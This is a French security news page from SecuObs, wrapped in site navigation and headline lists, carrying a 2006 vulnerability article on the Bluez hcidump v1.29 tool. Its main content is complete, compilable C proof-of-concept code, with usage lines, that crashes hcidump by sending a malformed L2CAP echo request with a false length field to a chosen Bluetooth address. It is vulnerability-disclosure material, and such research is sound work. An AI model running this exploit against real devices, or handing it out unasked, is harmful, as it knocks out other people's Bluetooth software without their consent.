Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Webinar ITrust 25 février 2016 14 00 Cartographiez votre réseau informatique avec IKare
- VMware lance vRealize Suite 7
- Régis Castagné, Directeur général Equinix France L'interconnexion, catalyseur de croissance de l'économie numérique
- Livre Blanc Schneider Electric Recommandations sur la marche à suivre avec un onduleur ancien
- Pour la sixième année consécutive, IDC place Trend Micro en tête du marché de la sécurité des serveurs.
- Le CHS Valvert favorise les usages de la MSSanté pour une meilleure prise en charge des patients
- Big Data vers une logique Data Centric
- 18 février la Fédération EBEN organise un Atelier Sécurité des Systèmes d'Information
- Saint-Valentin est-il risqué d'installer des applications de rencontre sur son appareil mobile professionnel
- Nacira Guerroudji-Salvan et Olivier Hassid rejoignent les équipes de PwC
- Exoscale affirme ses ambitions européennes avec le soutien de Swisscom Ventures
- Netflix malware and phishing campaigns help build emerging black market
- La Suite complète Avast Mobile Security désormais accessible à tous
- Etude Sungard Availability Services sur le quotidien des DSI français 60 pourcents des DSI déclarent avoir retardé ou renoncé à un projet important par manque de temps ou de ressources
- genMsecure lance genMforbanks pour apporter une réponse à l'explosion du vol de données bancaires

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- Embed with Elliot Audio Playback with Direct Digital Synthesis
- DOJ Hacker Also Accessed Forensic Reports and State Department Emails
- Microsoft Operations Management Suite review Part 1
- Hackers of Ukrainian Utilities Probably Hit Mining and Railroad Targets, Too
- Swarm of Robot Boats Coming To An Ocean Near You Soon
- Patch Your Cisco ASA s ASAP
- Austrian Minister Calls For a Constitutional Right To Pay In Cash
- Pirate Bay Browser Streaming Technology Is a Security and Privacy Nightmare
- Cover Your Glass A Lesson in Design Trades
- Google extends right to be forgotten to all domains
- Netflix Malware, Phishing Attacks Contributing to Rise of Black Market
- The Summary is dead. Long live the Summary
- SANS third annual incident response survey is now online
- Introducing the Sophos Love Song Collection Happy Valentine s Day IT heroes
- Determining Physical Location on the Internet

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- Mises à jour en perspective pour le système Vigik
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- WPA Cracker un cluster en ligne de 400 CPU et un dictionnaire de 135 millions d'entrées pour casser, ou pas, WPA/WPA2-PSK en 20 minutes
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [Ettercap – Partie 3] Ettercap par l'exemple - Affaiblissement de protocoles et attaque par injection
- IronWASP une plate-forme d'audit Web résolument modulaire
- Sqreen, protection applicative intelligente de nouvelle génération
- Les russes ont-ils pwn le système AEGIS ?
- Le support du protocole IEC-104 ajouté à NetworkMinner 1.04 pour le Forensic SCADA

Top bi-hebdo de la revue de presse
- Nevis encryption-detection software updated to version 1.5.0
- PIN vs frida vs DynamoRIO for binary only vulnerability discovery
- Les français, mauvais élèves en matière de protection de leurs données personnelles
- mdaemon_worldclient_form2raw.rb.txt
- Fêtes de fin d'année Acronis délivre ses 6 conseils pour protéger vos photos et vidéos souvenirs
- L'UE renforce la protection des données personnelles
- Startups from Europe, Israel and South Africa selected for Cyber London accelerator programme
- New Word malware Bestellung
- Emokit Hacking the Emotiv EPOC Brain-Computer Interface
- Wooxo et Nextep signent un accord de partenariat pour la distribution de solutions de protection des données informatiques

Top bi-hebdo de l'annuaire des videos
- OWASP Top 10 2 Cross Site Scripting XSS How to prevent attack
- Apple TV 2 FIX SSH exchange identification Connection closed by remote host REMOVE FIX IKEE Virus
- Comment Pirater Un Ordinateur Avec Ubuntu Metasploit
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Tutoriel Supprimer Cacaoweb Botnet
- SONY VAIO VGN UX280P Biometric Security
- kali linux Collecte d adresses Email avec Metasploit
- install zeus botnet
- Bbkeyswin WPA d une Bbox en 2 min sous Windows
- kali linux metasploit 4 6 db autopwn

Top bi-hebdo de la revue Twitter
- RT @mikko Incredible. Turns out the t․co outage 24h ago happened b/c somebody reported it as a phishing site.
- @HardRom SQL Injections are typically due to a vulnerability in software that is exploited. The author needs to ensure safe code practices.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- Video: Linux Native Multitouch Support
- 30,000 WordPress blogs infected to distribute rogue antivirus software - - Via @cio_australia
- @rosstav @tonyrobbins the blackhat seo type of spam... Let us know if you need any help.
- @GphreakX Interesting, shoot me an email (paul /at/ nessus.org), I want to hear more and help
- Phrack 66 publié !
- @trey_brown There was a old phone phreak conf that used to announce the number of people on the line. That was nice.
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Failles

English version with Google Translate

[Infratech - vulnérabilité] PoC pour le DoS sur hcidump

Par Pierre Betouin, secuobs.com
Le 05/02/2006


Résumé : Code Poc (Proof of Concept) qui permet de démontrer la faisabilité de la faille de type Déni de Service (DoS) sur l'utilitaire hcidump, équivalent bluetooth d'un outil comme tcpdump. - Lire l'article



PoC code could be also downloaded on lien - compilation needs libbluetooth.


/* Bluez hcidump v1.29 DoS - PoC code */
/* Pierre Betouin - pierre.betouin@infratech.fr */
/* 01/18/06 */
/* Vulnerability found using BSS fuzzer : */
/* Download www.secuobs.com/news/05022006-bluetooth10.shtml */
/* Crashes hcidump sending bad L2CAP packet */
/* */
/* gcc -lbluetooth hcidump-crash.c -o hcidump-crash */
/* ./hcidump-crash 00:80:37:XX:XX:XX */
/* L2CAP packet sent (15) */
/* Buffer: 08 01 0C 00 41 41 41 41 41 41 41 41 41 41 41 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 15
#define FAKE_SIZE 12

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc < 2)
{
fprintf(stderr, "%s <btaddr>\n", argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
{
perror("socket");
exit(EXIT_FAILURE);
}

memset(&addr, 0, sizeof(addr));
addr.l2_family = AF_BLUETOOTH;

if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("bind");
exit(EXIT_FAILURE);
}

str2ba(argv[1], &addr.l2_bdaddr);

if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("connect");
exit(EXIT_FAILURE);
}

if(!(buffer = (char *) malloc ((int) SIZE + 1)))
{
perror("malloc");
exit(EXIT_FAILURE);
}

memset(buffer, 'A', SIZE);

cmd = (l2cap_cmd_hdr *) buffer;
cmd->code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf("L2CAP packet sent (%d)\n", sent);
}

printf("Buffer:\t");
for(i=0; i<sent; i++)
printf("%.2X ", (unsigned char) buffer[i]);
printf("\n");

free(buffer);
close(sock);
return EXIT_SUCCESS;
}




Ce code peut être également téléchargé sur lien - la compilation a besoin de la libbluetooth.

Autres ressources sur la sécurité Bluetooth :

[Dossier Sécurité Bluetooth - partie 1] Introduction aux technologies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 2] Présentation des utilitaies Bluetooth lien

[Dossier Sécurité Bluetooth - partie 3] Les attaques génériques lien

[Dossier Sécurité Bluetooth - partie 4] Les attaques d'implémentations lien

[Dossier Sécurité Bluetooth - partie 5] Scénarios possibles & synthèse lien

[Infratech - vulnérabilité] PoC pour le DoS sur les téléphones Sony/Ericsson lien

[Infratech - vulnérabilité] Déni de Service sur les téléphones mobiles Sony/Ericsson lien

[Infratech - vulnérabilité] Déni de Service sur hcidump lien

[Infratech - release] BSS - Bluetooth Stack Smasher v0.6 lien



- Article suivant : [Infratech - vulnérabilité] Déni de Service sur hcidump
- Article précédent : [Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson
- Article suivant dans la catégorie Failles : [Infratech - vulnérabilité] Déni de Service sur hcidump
- Article précédent dans la catégorie Failles : [Infratech - vulnérabilité] PoC pour le DoS sur les téléphones portables Sony/Ericsson


Les derniers commentaires de la catégorie Failles:
- ESRT @sambowne - Russian firm Elcomsoft unveils tool to crack BlackBerry encryption security ...
- SPIP recently fixed 2 vulnerabilities notified by Tehtri-Security 0day ...
- PuttyHijack session hijack POC ...
- ESRT @thierryzoller - Updated BEAST blog post with Proof of Concept code and the whitepaper ...
- ESRT @y0ug @Securelist - New article published: MYBIOS Is BIOS infection a reality ...

Les derniers articles de la catégorie Failles :
- Les russes ont-ils pwn le système AEGIS ?
- Backdoors BMC éventuelles via une faille IPMI sur au moins 100 000 serveurs publics
- Jekyll, une application malicieuse contournant les détections de l App Store d Apple
- La vulnérabilité cryptographique d Android, l origine du vol de 5 720 dollars en bitcoins
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Une porte dérobée présente depuis 9 mois dans OpenX
- De mauvaises implémentations d UEFI permettent de contourner Secure Boot
- Prendre le contrôle d une voiture avec une manette de jeu, c est possible
- Une nouvelle vulnérabilité critique aurait été découverte dans Java 7
- Les problèmes de sécurité des cartes SIM peuvent être facilement corrigés




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :